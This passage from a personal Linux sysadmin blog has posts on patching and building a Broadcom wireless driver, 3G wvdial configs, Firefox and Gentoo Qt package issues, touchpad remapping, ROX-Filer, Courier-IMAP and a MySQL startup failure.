mybox:~/hybrid_wl# wget http://aur.archlinux.org/packages/broadcom-wl/broadcom-wl/broadcom-sta-5.10.91.9-linux-2.6.30-2.patch
mybox:~/hybrid_wl# wget -O hybrid-portsrc-x86_32-v5_10_91_9-convert_to_net_device_ops.diff http://bugs.gentoo.org/attachment.cgi?id=195182

Extract package:
mybox:~/hybrid_wl# tar -xzf /path/to/hybrid-portsrc-x86_32-v5_10_91_9.tar.gz

Start Patching:
mybox:~/hybrid_wl# sed -i hidden-essid.patch -e 's|5.10.79.10|src/wl/sys|g'
mybox:~/hybrid_wl# patch -p0 < hidden-essid.patch
patching file src/wl/sys/wl_iw.c
mybox:~/hybrid_wl# sed -i broadcom-sta-5.10.91.9-linux-2.6.30.patch -e 's|hybrid-portsrc-x86_32-v5_10_91_9.orig/||g'
mybox:~/hybrid_wl# sed -i broadcom-sta-5.10.91.9-linux-2.6.30.patch -e 's|hybrid-portsrc-x86_32-v5_10_91_9/||g'
mybox:~/hybrid_wl# patch -p0 <broadcom-sta-5.10.91.9-linux-2.6.30.patch
patching file src/wl/sys/wl_iw.c
Hunk #1 succeeded at 611 (offset 1 line).
Hunk #2 succeeded at 640 (offset 1 line).
Hunk #3 succeeded at 1119 (offset 1 line).
Hunk #4 succeeded at 1147 (offset 1 line).
Hunk #5 succeeded at 1807 (offset 1 line).
Hunk #6 succeeded at 1942 (offset 1 line).
patching file src/wl/sys/wl_linux.c
patching file src/wl/sys/wl_linux.h
mybox:~/hybrid_wl# patch -p0 < broadcom-sta-5.10.91.9-linux-2.6.30-2.patch
patching file src/wl/sys/wl_linux.c
mybox:~/hybrid_wl# sed -i hybrid-portsrc-x86_32-v5_10_91_9-convert_to_net_device_ops.diff -e 's|a/src/|src/|g'
mybox:~/hybrid_wl# sed -i hybrid-portsrc-x86_32-v5_10_91_9-convert_to_net_device_ops.diff -e 's|b/src/|src/|g'
mybox:~/hybrid_wl# patch -p0 < hybrid-portsrc-x86_32-v5_10_91_9-convert_to_net_device_ops.diff
patching file src/wl/sys/wl_linux.c
Hunk #1 succeeded at 225 (offset 6 lines).
patching file src/wl/sys/wl_iw.c

Compile the kernel module:
mybox:~/hybrid_wl# make -C /lib/modules/2.6.30-1-686-bigmem/build M=`pwd` clean
make: Entering directory `/usr/src/linux-headers-2.6.30-1-686-bigmem'
make: Leaving directory `/usr/src/linux-headers-2.6.30-1-686-bigmem'
mybox:~/hybrid_wl# make -C /lib/modules/2.6.30-1-686-bigmem/build M=`pwd`
make: Entering directory `/usr/src/linux-headers-2.6.30-1-686-bigmem'
LD /root/hybrid_wl/built-in.o
CC [M] /root/hybrid_wl/src/wl/sys/wl_linux.o
CC [M] /root/hybrid_wl/src/wl/sys/wl_iw.o
CC [M] /root/hybrid_wl/src/shared/linux_osl.o
LD [M] /root/hybrid_wl/wl.o
Building modules, stage 2.
MODPOST 1 modules
WARNING: modpost: missing MODULE_LICENSE() in /root/hybrid_wl/wl.o
see include/linux/module.h for more information
CC /root/hybrid_wl/wl.mod.o
LD [M] /root/hybrid_wl/wl.ko
make: Leaving directory `/usr/src/linux-headers-2.6.30-1-686-bigmem'

Install the new module:
mybox:~/hybrid_wl# cp wl.ko /lib/modules/2.6.30-1-686-bigmem/kernel/drivers/net/wireless/
mybox:~/hybrid_wl# depmod
mybox:~/hybrid_wl# modprobe wl

Check if everything loads correctly:
mybox:~/hybrid_wl# dmesg |tail
[ 66.229797] lib80211: common routines for IEEE802.11 drivers
[ 66.229805] lib80211_crypt: registered algorithm 'NULL'
[ 66.301793] wl: module license 'unspecified' taints kernel.
[ 66.301802] Disabling lock debugging due to kernel taint
[ 66.305919] wl 0000:02:00.0: PCI INT A -> GSI 16 (level, low) -> IRQ 16
[ 66.305933] wl 0000:02:00.0: setting latency timer to 64
[ 66.406146] lib80211_crypt: registered algorithm 'TKIP'
[ 66.408646] eth1: Broadcom BCM4328 802.11 Wireless Controller 5.10.91.9
[ 76.524135] eth1: no IPv6 routers present

You can also chek the iwconfig output. Hopefully everything will be fine…
I hope this saves a few hours of searching and experimenting for some people…

References:
1) 802.11 Linux STA driver
2) AUR broadcom-wl 5.10.91.9-2
3) Gentoo Bug: 284450 (New ebuild: net/wireless/broadcom-sta)

Filed by kargig at 00:22 under Linux
Tags: 2.6.30, Archlinux, broadcom, bug, bugfix, debian, Gentoo, kernel, Linux, module, patch, wireless
9 Comments | 5,185 views

The following configs can be used when you have either Vodafone Mobile Internet or Cosmote Internet on the Go or both 3G USB sticks and you want to connect to the 3G Internet (in Greece) while using Linux. I’ll provide two ways to connect to 3G, the command line way using wvdial and the GUI way using umtsmon.

1) Using wvdial
Create /etc/wvdial.conf:

[Dialer Defaults]
New PPPD = yes
Dial Command = ATDT
Dial Attempts = 1
Modem = /dev/ttyUSB0
Modem Type = Analog Modem
ISDN = 0
#commented out see the comments on the post.
#Baud = 460800
Username = user
Password = pass
Init1 = ATZ
Init2 = AT&F E1 V1 X1 &D2 &C1 S
[Dialer cosmote]
Phone = *99#
Stupid Mode = 1
Init3 = AT+CGDCONT=1,"IP","internet"
[Dialer vodafone]
Phone = *99#
Stupid Mode = 1
Init3 = AT+CGDCONT=1,"IP","internet"
[Dialer vfPIN]
Init4 = AT+CPIN=1234
[Dialer cmPIN]
Init4 = AT+CPIN=5678

WARNING: You HAVE to change the PINs on the last part of the config

To connect to Cosmote, plug in the usb stick:

# wvdial cmPIN
# wvdial cosmote

To connect to Vodafone, plug in the usb stick:

# wvdial vfPIN
# wvdial vodafone

2) Using umtsmon
Connection->Manage Profiles and create the necessary profiles with settings that look like these:

Username and Password does not really matter. Enter something like User/Pass or Username/Password.

Both versions tested on Debian and Gentoo and they are working just fine.

If someone has the Wind ADSM settings please provide them as a comment so I can complete the post with all three Greek 3G providers.

References: List of AT commands

Filed by kargig at 21:38 under Gentoo, Internet, Linux
Tags: 3G, cosmote, debian, Gentoo, Internet, Linux, umtsmon, vodafone, wvdial
8 Comments | 4,622 views

I’ve recently migrated on my debian from iceweasel (firefox) 3.0.X to swiftfox (firefox) 3.5b99 and I noticed that I could not import any new certificate authority root files. When I used a new profile everything worked as expected, so it was something that had to do with the migration of my old version 3.0.X profile to the new, version 3.5. It looks like there has been a modification in the way firefox 3.0.X and firefox 3.5 handles cert8.db file inside the profile directory. As soon as I deleted the file and restarted firefox I could import new certificate authority root files just fine. Of course I lost the old ones I had imported in the past…

Filed by kargig at 03:26 under Linux
Tags: bug, debian, firefox, Linux, migration, swiftfox
No Comments | 1,162 views

I’ve bumped into an Iceweasel + adblock plus bug: iceweasel: AdBlock Plus (1.0.2) custom element hiding filters does not work
It looks like Iceweasel from the stable branch of debian (version 3.0.6-1) has a problem hiding elements from websites. That makes some parts of adblock plus useless and ads start appearing on various websites.
What’s weird is that the problem only appears on Iceweasel and not on official Firefox (as the bug report says).

My options were to either a) switch to a testing/unstable version of Iceweasel from debian, b) get a binary package from firefox website or c) get another custom version. I chose method c) and I got swiftfox. Since Swiftfox provides a nice debian repo it was really easy to install and test. The whole experiment got even more interesting since swiftfox provides builds for firefox version 3.5…

After a update-alternatives --config x-www-browser I was ready to test it.
Swiftfox 3.5b4 works great with adblock plus and it even feels a bit faster. I can’t really tell for sure though. The only addon I had to reinstall was firegpg.

My impressions are great so far and I think I will keep it, at least until the bug mentioned gets resolved somehow on the stable branch.

Filed by kargig at 11:39 under Linux
Tags: adblock plus, browser, bug, debian, firefox, iceweasel, Linux, swiftfox
No Comments | 1,729 views

I’ve finally settled down to a solution that I am happy with. I used to have the following options inside my Xorg.conf:
Section "InputDevice"
Identifier "Synaptics Touchpad"
Driver "synaptics"
[...snip...]
Option "TapButton1" "1"
Option "TapButton2" "3"
Option "TapButton3" "2"
Option "VertTwoFingerScroll" "1"
Option "HorizTwoFingerScroll" "1"
[...snip...]


This works like this:
i) a single tap is a left click
ii) a two-finger tap is a right click
iii) a three-finger tap is a middle click
and you could scroll horizontally and vertically using two fingers on the touchpad, like Mac OS X.
The problem with this setup is that I used to have a lot of accidental double tappings while scrolling with two fingers horizontally or vertically. This of course produced unwanted right clicks.

I wanted a solution that I could get right click in somehow like Mac OS X does it, using ctrl+tap/ctrl+click. I found a solution that emulated ctrl+click as a right click but then many applications started misbehaving. Firefox for example uses ctrl+click on Linux to open a link on a new tab, when I used ctrl+click as a right click, Firefox stopped opening the links. So I went to plan B.

CMD key(apple key)-click as a right click.

To achieve that:
a) install xvkbd.
Debian: apt-get install xvkbd
Gentoo: emerge xvkbd
b) install xbindkeys.
Debian: apt-get install xbindkeys
Gentoo: emerge xbindkeys
c) create the default .xbindkeysrc file: xbindkeys –defaults > ~/.xbindkeysrc
d) edit it and put the following inside: "xvkbd -text '\m3'"
mod4 + b:1 (mouse)
e) edit xorg.conf and set this: Option "TapButton2" "0"
This effectively disables double tapping as a right click.
f) restart X
g) open a terminal and start xbindkeys from it: $ xbindkeys -n -v
Now press CMD key and tap the touchpad or click the touchpad button. You should be greeted with a fresh right click!

If all went well put xbindkeys in your DE’s autostart.

The following works flawlessly on XFCE/LXDE. CMD-click or CMD-tap opens XFCE’s menu or LXDE’s desktop menu.

On fluxbox though there is still a problem. It’s very common for fluxbox key config to look something like the following:
OnDesktop Mouse1 :hideMenus
OnDesktop Mouse2 :workspaceMenu
OnDesktop Mouse3 :rootMenu
OnDesktop Mouse4 :nextWorkspace
OnDesktop Mouse5 :prevWorkspace


So to open the RootMenu, which is the basic menu with the applications shortcuts for fluxbox, one needs to actually right click on the Desktop. That worked with TabButton2=3 but it does not work right now. To get around that problem I binded the key left to (1/!) which is normally the (±/§) key on Macs to the Menu key using xmodmap.
$ cat .xmodmap
keycode 94 = Menu

I never used that key anyway…

I’ve now got my precious right click back without accidental miss-clicks. yihaa!

References: FreeBSD on an Apple MacBook

Filed by kargig at 22:29 under Gentoo, Linux
Tags: accidental, click, ctrl+tap, ctrl-click, debian, fluxbox, Gentoo, Linux, lxde, macbook, right-click, synaptic, toucpad, xfce
5 Comments | 2,266 views

To complement alex’s post upgrading Qt libraries in Gentoo with Portage, here’s what started it all. I wanted to upgrade my kpdf to the most recent version without upgrading world. So the output of emerge -1uDNavt kpdf looked like this:

[ebuild U ] kde-base/kpdf-3.5.10-r1 [3.5.9] USE="-debug (-arts%) (-kdeenablefinal%) (-xinerama%)" 6 kB [0]
[nomerge ] app-mobilephone/pysmssend-1.32 USE="qt4" [?]
[nomerge ] dev-python/PyQt4-4.4.4-r2 USE="X dbus opengl qt3support svg -debug -doc -examples -webkit" [0]
[ebuild U ] x11-libs/qt-qt3support-4.5.1 [4.4.2] USE="accessibility -custom-cxxflags% -debug -kde% -pch -phonon%" 111,980 kB [0]
[ebuild U ] x11-libs/qt-sql-4.5.1 [4.4.2-r1] USE="iconv qt3support sqlite -custom-cxxflags -debug -firebird -mysql -odbc -pch -postgres" 0 kB [0]
[nomerge ] kde-base/kpdf-3.5.10-r1 [3.5.9] USE="-debug (-arts%) (-kdeenablefinal%) (-xinerama%)" [0]
[ebuild N ] virtual/poppler-qt3-0.10.5 0 kB [0]
[nomerge ] dev-python/PyQt4-4.4.4-r2 USE="X dbus opengl qt3support svg -debug -doc -examples -webkit" [0]
[ebuild U ] x11-libs/qt-gui-4.5.1 [4.4.2-r3] USE="accessibility dbus glib gtkstyle%* qt3support -cups -custom-cxxflags -debug -mng -nas -nis -pch -raster% -tiff -xinerama" INPUT_DEVICES="(-wacom%)" 0 kB [0]
[ebuild U ] x11-libs/qt-script-4.5.1 [4.4.2] USE="iconv%* -custom-cxxflags% -debug -pch" 0 kB [0]
[ebuild U ] x11-libs/qt-dbus-4.5.1 [4.4.2] USE="-custom-cxxflags -debug -pch" 0 kB [0]
[nomerge ] dev-python/PyQt4-4.4.4-r2 USE="X dbus opengl qt3support svg -debug -doc -examples -webkit" [0]
[nomerge ] x11-libs/qt-svg-4.4.2 USE="-debug -pch" [0]
[blocks b ] >x11-libs/qt-script-4.4.2-r9999 (">x11-libs/qt-script-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks b ] >x11-libs/qt-dbus-4.4.2-r9999 (">x11-libs/qt-dbus-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[nomerge ] sys-boot/unetbootin-319 [0]
[nomerge ] x11-libs/qt-gui-4.5.1 [4.4.2-r3] USE="accessibility dbus glib gtkstyle%* qt3support -cups -custom-cxxflags -debug -mng -nas -nis -pch -raster% -tiff -xinerama" INPUT_DEVICES="(-wacom%)" [0]
[blocks b ] [nomerge ] x11-libs/qt-svg-4.4.2 USE="-debug -pch" [0]
[blocks b ] >x11-libs/qt-qt3support-4.4.2-r9999 (">x11-libs/qt-qt3support-4.4.2-r9999" is blocking x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks b ] >x11-libs/qt-core-4.4.2-r9999 (">x11-libs/qt-core-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2)
[blocks b ] >x11-libs/qt-sql-4.4.2-r9999 (">x11-libs/qt-sql-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks b ] >x11-libs/qt-gui-4.4.2-r9999 (">x11-libs/qt-gui-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[ebuild U ] x11-libs/qt-test-4.5.1 [4.4.2] USE="iconv%* -custom-cxxflags% -debug -pch" 0 kB [0]
[ebuild U ] x11-libs/qt-core-4.5.1 [4.4.2-r2] USE="glib iconv qt3support ssl -custom-cxxflags -debug -doc -pch" 0 kB [0]
[nomerge ] kde-base/kpdf-3.5.10-r1 [3.5.9] USE="-debug (-arts%) (-kdeenablefinal%) (-xinerama%)" [0]
[ebuild U ] kde-base/kdeprint-3.5.10 [3.5.9] USE="kdehiddenvisibility -cups -debug -kde (-arts%) (-kdeenablefinal%) (-xinerama%)" 0 kB [0]
[nomerge ] app-text/epdfview-0.1.6-r1 USE="-cups -nls -test" [0]
[nomerge ] virtual/poppler-glib-0.10.5 USE="cairo" [0]
[nomerge ] app-text/poppler-bindings-0.10.5-r1 USE="cairo gtk qt3 qt4 -test" [0]
[nomerge ] app-text/poppler-0.10.5-r1 USE="-doc" [0]
[ebuild U ] media-libs/openjpeg-1.3-r2 [1.3] USE="-tools" 0 kB [0]
[nomerge ] kde-base/kdeprint-3.5.10 [3.5.9] USE="kdehiddenvisibility -cups -debug -kde (-arts%) (-kdeenablefinal%) (-xinerama%)" [0]
[ebuild U ] app-text/enscript-1.6.4-r4 [1.6.4-r3] USE="-nls -ruby" 1,013 kB [?=>0]
[nomerge ] app-pda/msynctool-0.21 [0]
[nomerge ] app-pda/libopensync-0.21 USE="-debug -doc -python" [0]
[ebuild U ] dev-db/sqlite-3.6.13 [3.6.11] USE="threadsafe -debug -doc -soundex -tcl" 0 kB [0]
[blocks B ] [blocks B ] >x11-libs/qt-test-4.4.2-r9999 (">x11-libs/qt-test-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks B ] >x11-libs/qt-script-4.4.2-r9999 (">x11-libs/qt-script-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks B ] >x11-libs/qt-dbus-4.4.2-r9999 (">x11-libs/qt-dbus-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks B ] [blocks B ] [blocks B ] [blocks B ] [blocks B ] >x11-libs/qt-qt3support-4.4.2-r9999 (">x11-libs/qt-qt3support-4.4.2-r9999" is blocking x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks B ] [blocks B ] [blocks B ] >x11-libs/qt-core-4.4.2-r9999 (">x11-libs/qt-core-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2)
[blocks B ] [blocks B ] >x11-libs/qt-sql-4.4.2-r9999 (">x11-libs/qt-sql-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks B ] >x11-libs/qt-gui-4.4.2-r9999 (">x11-libs/qt-gui-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks B ] Total: 13 packages (12 upgrades, 1 new), Size of downloads: 112,998 kB
Conflict: 23 blocks (16 unsatisfied)
Portage tree and overlays:
[0] /usr/portage
[?] indicates that the source repository could not be determined
* Error: The above package list contains packages which cannot be
* installed at the same time on the same system.
('installed', '/', 'x11-libs/qt-svg-4.4.2', 'nomerge') pulled in by
>=x11-libs/qt-svg-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
('ebuild', '/', 'x11-libs/qt-gui-4.5.1', 'merge') pulled in by
>=x11-libs/qt-gui-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
x11-libs/qt-gui required by ('installed', '/', 'media-video/vlc-0.9.8a', 'nomerge')
x11-libs/qt-gui required by ('installed', '/', 'sys-boot/unetbootin-319', 'nomerge')
(and 4 more)
('ebuild', '/', 'x11-libs/qt-test-4.5.1', 'merge') pulled in by
x11-libs/qt-test:4 required by ('installed', '/', 'app-text/poppler-bindings-0.10.5-r1', 'nomerge')
('ebuild', '/', 'x11-libs/qt-qt3support-4.5.1', 'merge') pulled in by
~x11-libs/qt-qt3support-4.5.1[-debug] required by ('ebuild', '/', 'x11-libs/qt-gui-4.5.1', 'merge')
>=x11-libs/qt-qt3support-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
('installed', '/', 'x11-libs/qt-opengl-4.4.2', 'nomerge') pulled in by
>=x11-libs/qt-opengl-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
('ebuild', '/', 'x11-libs/qt-dbus-4.5.1', 'merge') pulled in by
~x11-libs/qt-dbus-4.5.1[-debug] required by ('ebuild', '/', 'x11-libs/qt-gui-4.5.1', 'merge')
>=x11-libs/qt-dbus-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
('installed', '/', 'x11-libs/qt-core-4.4.2-r2', 'nomerge') pulled in by
~x11-libs/qt-core-4.4.2 required by ('installed', '/', 'x11-libs/qt-script-4.4.2', 'nomerge')
x11-libs/qt-core required by ('installed', '/', 'media-video/vlc-0.9.8a', 'nomerge')
x11-libs/qt-core:4[qt3support] required by ('installed', '/', 'app-admin/keepassx-0.4.0', 'nomerge')
(and 7 more)
('installed', '/', 'x11-libs/qt-dbus-4.4.2', 'nomerge') pulled in by
>=x11-libs/qt-dbus-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
~x11-libs/qt-dbus-4.4.2 required by ('installed', '/', 'x11-libs/qt-gui-4.4.2-r3', 'nomerge')
('installed', '/', 'x11-libs/qt-qt3support-4.4.2', 'nomerge') pulled in by
~x11-libs/qt-qt3support-4.4.2 required by ('installed', '/', 'x11-libs/qt-gui-4.4.2-r3', 'nomerge')
>=x11-libs/qt-qt3support-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
('installed', '/', 'x11-libs/qt-xmlpatterns-4.4.2', 'nomerge') pulled in by
x11-libs/qt-xmlpatterns:4 required by ('installed', '/', 'app-admin/keepassx-0.4.0', 'nomerge')
('installed', '/', 'x11-libs/qt-gui-4.4.2-r3', 'nomerge') pulled in by
>=x11-libs/qt-gui-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
x11-libs/qt-gui required by ('installed', '/', 'media-video/vlc-0.9.8a', 'nomerge')
x11-libs/qt-gui required by ('installed', '/', 'sys-boot/unetbootin-319', 'nomerge')
(and 6 more)
('ebuild', '/', 'x11-libs/qt-core-4.5.1', 'merge') pulled in by
~x11-libs/qt-core-4.5.1[qt3support,-debug] required by ('ebuild', '/', 'x11-libs/qt-sql-4.5.1', 'merge')
x11-libs/qt-core:4[qt3support] required by ('installed', '/', 'app-admin/keepassx-0.4.0', 'nomerge')
~x11-libs/qt-core-4.5.1[-debug] required by ('ebuild', '/', 'x11-libs/qt-script-4.5.1', 'merge')
(and 7 more)

The output is also at: http://dpaste.com/52703/
Unless you are a Gentoo Developer there is no easy way to understand the output.
So I joined #gentoo-el on Freenode to ask the greek gentoo developers (hwoarang, deathwing00, tampakrap, wired, yngwin), which happen to be on QT/KDE herds, to explain to me what’s wrong.
I was suggested to run an emerge -uDavt world to upgrade my whole system, but that’s not what I wanted and I asked for a solution that would not involve upgrading the whole system. The following is the output of emerge -uDNavt world:

http://pastebin.com/m8371430

Then they explained to me that there has been a change on QT eclass to provide protection to the system from having mixed QT versions. The problem is that the protection works by blocking the mix, but the output is at least “unfriendly”.

The solution, as alex said is to do: emerge -av1 `eix -I --only-names x11-libs/qt-`

Even though eix is a standard tool every gentoo user has probably installed, I don’t really like the solution because it depends on using another extra program, eix, and not pure portage techniques. Portage should be able, somehow, to handle these dependency problems and provide a custom error when such a problem occurs. The errors on “-9999″ versions need vast improvement.

I hope Gentoo devs do something about improving portage even more

*EDIT*
After a small conversation with alex, I completely unmerged my x11-libs/qt-4.X package. As it seems it’s not needed at all any longer since all programs correctly reference the x11-libs/qt-NAME-4.X.

Filed by kargig at 21:35 under Gentoo, Linux
Tags: blocks, eclass, Gentoo, kde, Linux, portage, qt
1 Comment | 2,223 views

Firefox has the feature of keeping links to downloaded files as urls using the file:// pattern. For example: file:///home/user/downloads/test.zip. If you choose ROX-Filer (/usr/bin/rox) to open these files you will get an error:

File doesn’t exist, or I can’t access it: file:///home/user/downloads/test.zip

One way to correct the error is to follow the instructions of http://lovingthepenguin.blogspot.com/2008/08/use-rox-filer-to-open-containing.html

Another way for Gentoo users, and much proper I guess, is to use /usr/bin/roxuri. roxuri is actually a shell script that uses the “-U” option for ROX:

-U, –url=URL open file or directory in URI form

For the non-Gentoo users, /usr/bin/roxuri is:
#!/bin/sh
exec "/usr/lib/rox/ROX-Filer/AppRun" -U "$@"

Create it and make it executable.

Go to Firefox Preferences/Applications/Content Type -> file and select /usr/bin/roxuri as the default application.

Now files from firefox downloads are handled correctly by rox which uses the proper applications to open them and containing folders open up with ROX-Filer. That means that while “file” is handled by roxuri, a .pdf will be opened by epdfview or whatever else you have chosen ROX to open pdf files with.

Both solutions work on ROX version 2.8.

Filed by kargig at 18:17 under Gentoo, Linux
Tags: bug, file://, firefox, Gentoo, Linux, rox, tip
1 Comment | 728 views

It’s been a while since ivman stopped working on my Gentoo box but I never had the time nor the willingness to take a look into it. It appears that ivman is incompatible with some newer versions of hal and dbus. The good thing is that there’s an alternative, it’s called halevt and as far as I’ve taken a look into it the configuration options look quite straightforward.
For Gentoo, there are ebuilds for halevt on Gentoo bugzilla, which install just fine.

In my point of view there’s an issue here for Gentoo. Latest ivman (sys-apps/ivman-0.6.14) compiles just fine against all of its dependencies, but then it does nothing at all when a deviced is plugged in. If the devices are present when ivman starts then it can detect and mount them, if you plug the devices after ivman is started, then ivman does nothing at all. I think ivman is broken since hal 0.5.9.X versions. Gentoo developers stll keep ivman in the stable tree though. I find no real logic to this decision. Ivman is buggy with current stable hal and dbus. I would prefer a de-stabilization of ivman or even a package mask for it. What’s the point in keeping a package (ivman) in the stable tree since it requires not the latest stable but an older version of another package (hal) ? IMHO, since they correctly decided to stabilize hal 0.5.11-r8, which subsequently rendered ivman useless, ivman should be wiped from the stable tree.
Some bugs on ivman reported on Gentoo Bugzilla: http://bugs.gentoo.org/buglist.cgi?quicksearch=ivman

I once used ivman with a couple of custom scripts to create/remove icons of automounted devices on my ROX desktop. I think I can make these scripts work again with halevt…I am in the process of rewriting them. More on that in the following days…

Filed by kargig at 01:06 under Gentoo, Linux
Tags: automount, bug, bugzilla, Gentoo, hal, halevt, ivman, Linux, rox
7 Comments | 2,000 views

If you have an IMAP server based on Courier-IMAP and you get complains from people using the default Mail.app on Mac OS X about getting many warning messages and not being able to connect, the remedy is to increase the maximum allowed concurrent sessions per IP. They possibly have multiple accounts on the server and Mail.app is not able to handle each connection properly.
The cure is to open up /etc/courier-imap/imapd-ssl and /etc/courier-imap/imapd, find the MAXPERIP setting and change it to something like:
MAXPERIP=10

Don’t forget to restart your courier-imap server for changes to take effect.

By default the MAXPERIP setting is set to 4. On the imapd-ssl file it’s not even included in the config file (but still set to 4) so you need to add it yourself.

Filed by kargig at 12:20 under Linux, MacOSX
Tags: configs, courier, imap, Linux, MacOSX, mail, maxperip, ssl
No Comments | 1,011 views

comzeradd send me an e-mail about a mysql service not starting in a server we administer. I started taking a look around…nothing seemed suspicious.
I tried uninstalling and re-installing mysql-server-5.0 a few times and I always got this kind of output from apt-get:

Stopping MySQL database server: mysqld.
Starting MySQL database server: mysqld . . . . . . . . . . . . . . failed!
invoke-rc.d: initscript mysql, action “start” failed.
dpkg: error processing mysql-server-5.0 (–configure):
subprocess post-installation script returned error exit status 1
Errors were encountered while processing:
mysql-server-5.0
Reading package lists… Done
Building dependency tree
Reading state information… Done
Reading extended state information
Initializing package states… Done
Reading task descriptions… Done

(more…)

Filed by kargig at 19:35 under Linux
Tags: bind-address, debian, init, Linux, loopback, mysql
2 Comments | 545 views